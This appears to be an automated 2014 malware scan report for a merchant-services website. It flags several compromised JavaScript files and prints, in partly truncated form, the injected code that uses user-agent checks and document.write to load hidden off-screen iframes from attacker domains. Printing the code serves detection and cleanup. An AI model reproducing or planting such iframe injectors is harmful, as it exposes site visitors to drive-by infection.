Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=betterbusinesssolutions.us
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://betterbusinesssolutions.us/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://betterbusinesssolutions.us/ | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:26 GMT Age: 0 Location: http://www.bbsinc.us Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/ | 200 OK Content-Length: 23062 Content-Type: text/html | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/mootools/mootools-release-1.11.js | 200 OK Content-Length: 1467 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com ...[638 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Decoded script: <iframe src="http://agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe><iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/media/system/js/caption.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:28 GMT Age: 1 Location: http://www.bbsinc.us/media/system/js/caption.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/media/system/js/caption.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_scroller/mod_yoo_scroller.js | 200 OK Content-Length: 1465 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/modules/mod_yoo_search/mod_yoo_search.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://www.bbsinc.us/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 4826 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ...[1961 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); function Art_protection() { function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) ...[1559 bytes skipped]... Antivirus reports:
Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/base.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:31 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/base.js | 200 OK Content-Length: 1470 Content-Type: application/x-javascript | malicious |
Malicious code found. Script contains blacklisted domain: daboglow.riftenterprises.com ...[638 bytes skipped]... agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe>'); } } Art_protection(); function Grandarium() { var soset = navigator.userAgent; var unicode = (soset.indexOf("IEMobile") > -1 || soset.indexOf("Chrome") > -1 || soset.indexOf("Windows") < +1); if (!unicode) { document.write('<iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe>'); } } Grandarium(); Decoded script: <iframe src="http://agirtuler.intservers.us/biblarudios16.html" style="top:-999px;left:-999px;position:absolute;" height="131" width="131"></iframe><iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"></iframe> Malicious iFrame found. size: 138x138 src: http://daboglow.riftenterprises.com/camendatro15.html This URL is marked by Google as suspicious <iframe src="http://daboglow.riftenterprises.com/camendatro15.html" style="position:absolute;top: -888px;left: -888px;border-style:dashed;border-color:green;background-color:purple;" height="138" width="138"> | ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/accordionmenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:32 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/accordionmenu.js | 200 OK Content-Length: 2320 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( if (!(tog.hasClass('active') || this.options.display == 'all' || this.options.display == i)) { fx.hide(); } span.addEvent('click', function(){ fx.toggle(); }); }.bind(this)); } }); YOOAccordionMenu.implement(new Options);document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" Antivirus reports:
| ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/fancymenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:33 GMT Age: 0 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/fancymenu.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:33 GMT Age: 1 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/addons/dropdownmenu.js | 200 OK Content-Length: 1457 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutions.us/templates/yoo_level/lib/js/yoo_tools.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:34 GMT Age: 1 Location: http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/templates/yoo_level/lib/js/yoo_tools.js | 200 OK Content-Length: 887 Content-Type: application/x-javascript | clean |
http://betterbusinesssolutions.us/wthvideo/wthvideo.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:36 GMT Age: 0 Location: http://www.bbsinc.us/wthvideo/wthvideo.js Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/wthvideo/wthvideo.js | 200 OK Content-Length: 1457 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( function Opelcorsamodel() { var ariga = navigator.userAgent; var hightvo = (ariga.indexOf("IEMobile") > -1 || ariga.indexOf("Windows") < +1 || ariga.indexOf("Chrome") > -1); if (!hightvo) { document.write('<iframe src="http://polterges.cariboolife.ca/ploidarada.cgi?15" style="position:absolute;border-style:none;left: -848px;background-color:brown;top: -848px;" height="137" width="137"></iframe>'); } } Opelcorsamodel(); Antivirus reports:
| ||
http://betterbusinesssolutions.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:36 GMT Age: 1 Location: http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&Itemid=125 Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/index.php?option=com_contact&view=contact&id=1&itemid=125 | 200 OK Content-Length: 14944 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.betterbusinesssolutions.us <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <meta name="robots" content="index, follow" /> <meta name="keywords" content="Credit Card Processing, Merchant Servics ...[4437 bytes skipped]... | ||
http://www.bbsinc.us/media/system/js/validate.js | 200 OK Content-Length: 5284 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Art_protection() {
function setCookie(name, value, expires) { var date = new Date( new Date().getTime() + expires*1000 ); document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function takeOrlondo(name) { var nachos = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return nachos ? decodeURIComponent(nachos[1]) : undefined; } var cookie = takeOrlondo( $(el.labelref).addClass('invalid'); } } else { el.removeClass('invalid'); if (el.labelref) { $(el.labelref).removeClass('invalid'); } } } }); document.formvalidator = null; Window.onDomReady(function(){ document.formvalidator = new JFormValidator(); });document.write('<iframe style="position:fixed;top:0px;left:-550px;" src="http://mwancv.ddns.name/e5043c703de0ea57a.ebLoZqL?14" height="499" width="499" Antivirus reports:
| ||
http://betterbusinesssolutions.us/index.php?option=com_content&view=article&id=116&Itemid=124 | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=900 Connection: close Date: Sat, 20 Sep 2014 18:48:38 GMT Age: 1 Location: http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&Itemid=124 Server: Microsoft-IIS/7.5 Content-Length: 0 Content-Type: text/html X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET | clean |
http://www.bbsinc.us/index.php?option=com_content&view=article&id=116&itemid=124 | 200 OK Content-Length: 16187 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Sat, 20 Sep 2014 18:48:26 GMT
Age: 0
Location: http://www.bbsinc.us
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: max-age=900
Connection: close
Date: Sat, 20 Sep 2014 18:48:26 GMT
Age: 0
Location: http://www.bbsinc.us
Server: Microsoft-IIS/7.5
Content-Length: 0
Content-Type: text/html
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Referer: http://www.google.com/search?q=betterbusinesssolutions.us
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: betterbusinesssolutions.us
Referer: http://www.google.com/search?q=betterbusinesssolutions.us
Result:
The result is similar to the first query. There are no suspicious redirects found.